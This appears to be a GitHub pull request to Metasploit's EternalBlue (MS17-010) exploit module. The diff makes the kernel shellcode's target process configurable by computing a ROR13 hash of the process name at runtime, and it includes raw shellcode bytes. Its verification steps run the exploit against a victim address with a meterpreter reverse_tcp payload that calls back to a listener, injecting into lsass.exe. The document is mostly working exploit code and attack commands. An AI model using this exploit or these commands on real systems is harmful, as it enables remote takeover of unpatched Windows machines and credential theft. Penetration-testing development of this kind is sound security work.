### PR TITLE
Add support for ms17_010_eternalblue ProcessName option

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -167,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def smb_eternalblue(process_name, grooms)
     begin
       # Step 0: pre-calculate what we can
-      shellcode =  make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)
+      shellcode =  make_kernel_user_payload(payload.encode, process_name, 0, 0, 0, 0)
       payload_hdr_pkt = make_smb2_payload_headers_packet
       payload_body_pkt = make_smb2_payload_body_packet(shellcode)
 
@@ -580,13 +580,29 @@ class MetasploitModule < Msf::Exploit::Remote
   # teb_acp = TEB.ActivationContextPointer offset
   # et_tle = ETHREAD.ThreadListEntry offset
   def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)
-    sc = make_kernel_shellcode
+    sc = make_kernel_shellcode(proc_name)
     sc << [ring3.length].pack("S<")
     sc << ring3
     sc
   end
 
-  def make_kernel_shellcode
+  def hash(process)
+    # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    proc_hash = 0
+    process += "\x00"
+    process.each_byte { |c|
+      proc_hash  = ror(proc_hash, 13)
+      proc_hash += c
+    }
+    return [proc_hash].pack('l<')
+  end
+
+  def ror(dword, bits)
+    return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
+  end
+
+
+  def make_kernel_shellcode(proc_name="spoolsv.exe")
     # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
     # Length: 1019 bytes
 
@@ -618,7 +634,7 @@ class MetasploitModule < Msf::Exploit::Remote
     "\x81\xF9\x00\x00\x01\x00\x0F\x8D\x66\x01\x00\x00\x4C\x89\xF2\x89" +
     "\xCB\x41\xBB\x66\x55\xA2\x4B\xE8\xBC\x01\x00\x00\x85\xC0\x75\xDB" +
     "\x49\x8B\x0E\x41\xBB\xA3\x6F\x72\x2D\xE8\xAA\x01\x00\x00\x48\x89" +
-    "\xC6\xE8\x50\x01\x00\x00\x41\x81\xF9\xBF\x77\x1F\xDD\x75\xBC\x49" +
+    "\xC6\xE8\x50\x01\x00\x00\x41\x81\xF9" + hash(proc_name.upcase) + "\x75\xBC\x49" +
     "\x8B\x1E\x4D\x8D\x6E\x10\x4C\x89\xEA\x48\x89\xD9\x41\xBB\xE5\x24" +
     "\x11\xDC\xE8\x81\x01\x00\x00\x6A\x40\x68\x00\x10\x00\x00\x4D\x8D" +
     "\x4E\x08\x49\xC7\x01\x00\x10\x00\x00\x4D\x31\xC0\x4C\x89\xF2\x31" +

--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -589,20 +589,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def hash(process)
     # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
     proc_hash = 0
-    process += "\x00"
-    process.each_byte { |c|
+    process << "\x00"
+    process.each_byte do |c|
       proc_hash  = ror(proc_hash, 13)
       proc_hash += c
-    }
-    return [proc_hash].pack('l<')
+    end
+    [proc_hash].pack('l<')
   end
 
   def ror(dword, bits)
-    return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
+    ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
   end
 
 
-  def make_kernel_shellcode(proc_name="spoolsv.exe")
+  def make_kernel_shellcode(proc_name)
     # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
     # Length: 1019 bytes
 


### PR DESCRIPTION
The shellcode was hardcoded to process "spoolsv.exe". This change adds support for ProcessName option by using runtime hash.

## Verification
- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/ms17_010_eternalblue`
- [x] `set processname lsass.exe`
- [x] `set rhost <victim-address>`
- [x] `set payload windows/x64/meterpreter/reverse_tcp`
- [x] `set lhost <listener-address>`
- [x] `run`
- [x] `ps` to find the PID of lsass.exe
- [x] `getpid` to check the PID